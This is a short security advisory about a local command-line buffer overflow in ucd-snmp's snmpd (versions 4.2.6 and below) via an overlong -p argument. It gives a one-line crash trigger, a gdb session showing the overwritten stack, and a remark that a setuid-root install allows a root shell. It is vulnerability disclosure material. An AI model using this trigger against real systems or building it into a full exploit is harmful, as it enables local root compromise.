ucd-snmp versions 4.2.6 and below suffer from a buffer overflow on the command line when the daemon is spawned.
24514b893dcbc9255cf0b3b4192324d7c0f00059646711e8fb3fc0a35111ed7c
---------- priestmasters UCD SNMP local buffer overflow advisorie -------------
Affected file: /usr/local/bin/snmpd
Version : ucd-snmp <= 4.2.6
Error class : command line buffer overflow
It's possible to overflow a buffer, if we start it with a long string as
Argument after the -p switch.
- ./snmpd -p `perl -e 'print "A"x6700'`
- Segmentation fault
In gdb:
- (gdb) r -p `perl -e 'print "A"x6700'`
- The program being debugged has been started already.
- Start it from the beginning? (y or n) y
- Starting program: /usr/local/sbin/./snmpd -p `perl -e 'print "A"x6700'`
- Program received signal SIGSEGV, Segmentation fault.
- 0x804a2d6 in main (argc=1094795585, argv=0x41414141) at snmpd.c:453
- 453 if (argv[arg][0] == '-') {
Buf is the overflowed buffer.
- (gdb) x/50x buf
- 0xbfffc4bc: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbfffc4cc: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbfffc4dc: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbfffc4ec: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbfffc4fc: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbfffc50c: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbfffc51c: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbfffc52c: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbfffc53c: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbfffc54c: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbfffc55c: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbfffc56c: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbfffc57c: 0x41414141 0x41414141
If snmpd is installed setuid root, it's possible to overwrite the
return address and jump to another location (shellcode) and launch
a setuid root shell (Local root compromise).
If you have questions, mail me or visit my homepage.
<priest@priestmaster.org>
http://www.priestmaster.org
Happy hacking,
priestmaster